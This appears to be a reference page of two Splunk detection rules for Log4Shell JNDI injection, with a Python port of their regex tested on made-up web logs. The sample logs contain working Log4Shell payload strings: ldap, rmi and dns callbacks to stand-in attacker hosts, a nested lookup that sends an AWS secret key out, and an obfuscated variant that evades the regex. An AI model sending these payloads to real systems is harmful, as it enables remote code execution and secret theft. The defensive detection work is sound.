Techniques
Sample rules
Log4Shell JNDI Payload Injection with Outbound Connection
- source: splunk
- techniques:
- T1190
- T1133
Description
The following analytic detects Log4Shell JNDI payload injections that are followed by an outbound connection. It extracts the JNDI lookup (for example ${jndi:ldap://PAYLOAD_INJECTED}) and the callback host from raw web events, then performs an inner join of that host against destinations observed in the Network_Traffic data model, so only payloads whose callback host the environment actually connected to are returned. This detection leverages the Web and Network_Traffic data models in Splunk. Because the join is on the exact host string extracted from the payload, a payload that names a hostname will not pair with traffic that is recorded by destination IP address. Monitoring this activity is crucial because it targets the JNDI lookup in Java web applications using log4j and can lead to remote code execution. If confirmed malicious, attackers could gain unauthorized access, execute arbitrary code, and compromise sensitive data within the affected environment.
Detection logic
| from datamodel Web.Web
| rex field=_raw max_match=0 "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?<proto>\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<affected_host>[a-zA-Z0-9\.\-\_\$]+)"
| join affected_host type=inner [
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic.All_Traffic by All_Traffic.dest
| `drop_dm_object_name(All_Traffic)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| rename dest AS affected_host]
| fillnull
| stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user
| `log4shell_jndi_payload_injection_with_outbound_connection_filter`
Log4Shell JNDI Payload Injection Attempt
- source: splunk
- techniques:
- T1190
- T1133
Description
The following analytic identifies attempts to inject Log4Shell JNDI payloads via web calls. It leverages the Web data model and applies a regex to the raw web event (HTTP headers included) to detect patterns such as ${jndi:ldap://, accepting the separators in raw or URL-encoded form (%3A, %2F) and the string jndi in any letter case. This activity is significant because it targets the Log4j vulnerability in Java web applications, such as Apache Struts and Solr. A match shows that a payload was delivered, not that the lookup succeeded; if confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to full system compromise. Immediate investigation is required to determine whether the attempt was successful and to mitigate any potential exploitation.
Detection logic
| from datamodel Web.Web
| regex _raw="[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?"
| fillnull
| stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user
| `log4shell_jndi_payload_injection_attempt_filter`
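Both analytics above rely on the same regex: the first rule adds an inner join against Network_Traffic, the second reports every match. The added example below (Python, written for this page and not Splunk's own code) ports that regex and runs it over a handful of constructed Apache-style access log lines, then mirrors the first rule's join against a constructed set of traffic destinations. The log lines, hosts, IP addresses and destinations are made up, and the function names are the example's own.

```python
"""Port of the Log4Shell JNDI regex used by the two Splunk analytics above,
run over constructed web log lines. Added example, not Splunk code: the log
lines, hosts and traffic destinations are made up for the demonstration."""
import re

# Translation of the SPL regex. Separators and '://' are accepted raw or
# URL-encoded, 'jndi' in any letter case, and an optional nested ${...}
# lookup (as in ${env:...}) is skipped so the capture lands on the real host.
JNDI_RE = re.compile(
    r"[jJnNdDiI]{4}(?::|%3A|/|%2F)"        # jndi + ':' or '/' (raw/encoded)
    r"(?P<proto>\w+)"                        # ldap, rmi, dns, ...
    r"(?:://|%3A%2F%2F)"                     # '://' raw or URL-encoded
    r"(?:\$\{.*?\}\.?)?"                     # optional nested ${...} prefix
    r"(?P<affected_host>[a-zA-Z0-9._$-]+)"   # callback host (IP or name)
)

# Constructed Apache-style access log lines (not real traffic).
SAMPLE_WEB_LOGS = [
    # plain payload in the query string
    '10.0.0.5 - - [10/Dec/2021:12:00:00 +0000] "GET /?x=${jndi:ldap://203.0.113.10:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # fully URL-encoded payload, rmi scheme
    '10.0.0.6 - - [10/Dec/2021:12:00:01 +0000] "GET /api?q=%24%7Bjndi%3Armi%3A%2F%2Fcallback.example.net%2Fx%7D HTTP/1.1" 404 0 "-" "python-requests/2.26"',
    # payload in the User-Agent header with a nested ${env:...} exfil lookup
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.198.51.100.7/x}"',
    # mixed-case jndi and scheme
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${JnDi:DnS://attacker.example.org/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # benign request
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    # nested-lookup obfuscation of the word 'jndi' itself: NOT matched by this regex
    '192.0.2.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?x=${${lower:j}ndi:ldap://203.0.113.77/a} HTTP/1.1" 200 12 "-" "curl/7.79.1"',
]

# Constructed stand-in for the All_Traffic.dest values seen in Network_Traffic.
SAMPLE_TRAFFIC_DESTS = {"203.0.113.10", "198.51.100.7", "93.184.216.34"}


def detect_injection_attempts(lines):
    """Mirror of 'Log4Shell JNDI Payload Injection Attempt': every regex
    match in the raw event is reported, whether or not anything called back."""
    hits = []
    for line in lines:
        for m in JNDI_RE.finditer(line):
            hits.append({"proto": m.group("proto"),
                         "affected_host": m.group("affected_host"),
                         "raw": line})
    return hits


def correlate_with_outbound(hits, traffic_dests):
    """Mirror of the inner join in 'Log4Shell JNDI Payload Injection with
    Outbound Connection': keep hits whose extracted host also appears as a
    traffic destination. The match is on the exact string, so a hostname in
    the payload will not pair with traffic logged by destination IP."""
    return [h for h in hits if h["affected_host"] in traffic_dests]


if __name__ == "__main__":
    attempts = detect_injection_attempts(SAMPLE_WEB_LOGS)
    for h in attempts:
        print(f"attempt: proto={h['proto']:<4} host={h['affected_host']}")
    for h in correlate_with_outbound(attempts, SAMPLE_TRAFFIC_DESTS):
        print(f"confirmed outbound: {h['affected_host']}")
```

Two things the run makes visible. The regex handles raw and URL-encoded separators and steps over a nested ${env:...} lookup to reach the real callback host, but it does not fire on the last sample line, where the word jndi itself is assembled from a nested ${lower:j} lookup; tuning for that class of obfuscation is outside what the two rules above do. And the correlation step pairs only the two payloads that name an IP address, because callback.example.net is not present as a destination string in the constructed traffic set; in a real deployment the join behaves the same way unless Network_Traffic carries the destination in the same form the payload used.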